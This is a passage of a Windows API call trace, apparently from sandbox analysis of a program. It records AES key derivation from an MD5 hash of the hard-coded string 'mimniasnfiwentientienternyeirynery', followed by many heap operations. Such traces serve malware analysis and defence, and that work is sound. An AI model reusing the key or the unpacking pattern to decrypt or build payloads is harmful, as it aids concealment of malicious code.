out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.492] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.492] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0080.492] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0080.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0080.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0080.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0080.492] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a4e98) returned 1 [0080.493] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0080.493] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.592] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0080.592] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.592] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.592] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.592] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0080.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cb498, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0080.592] CryptCreateHash (in: hProv=0x41a4e98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0080.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0080.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0080.592] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0080.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0080.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0080.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0080.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c35f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0080.593] CryptHashData (hHash=0x41ac140, pbData=0x17e2c08, dwDataLen=0x22, dwFlags=0x1) returned 1 [0080.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.593] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0080.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c3860, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0080.593] CryptDeriveKey (in: hProv=0x41a4e98, Algid=0x6610, hBaseData=0x41ac140, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac640) returned 1 [0080.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0080.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0080.594] CryptDestroyHash (hHash=0x41ac140) returned 1 [0080.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0080.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0080.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0080.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3aa0 [0080.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a58 [0080.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a28 [0080.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0080.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a28 | out: hHeap=0x1780000) returned 1 [0080.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a58 | out: hHeap=0x1780000) returned 1 [0080.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b48 [0080.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c39e0 [0080.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b00 [0080.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0080.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b00 | out: hHeap=0x1780000) returned 1 [0080.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c39e0 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a40 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c39c8 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3aa0 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b48 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0080.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0080.596] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0080.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0080.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0080.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0080.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0080.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0080.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c39b0 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0080.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0080.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0080.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0080.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0080.599] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0080.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0080.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0080.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0080.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0080.599] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0080.599] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0080.599] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0080.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0080.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0080.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0080.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0080.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0080.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0080.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0080.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 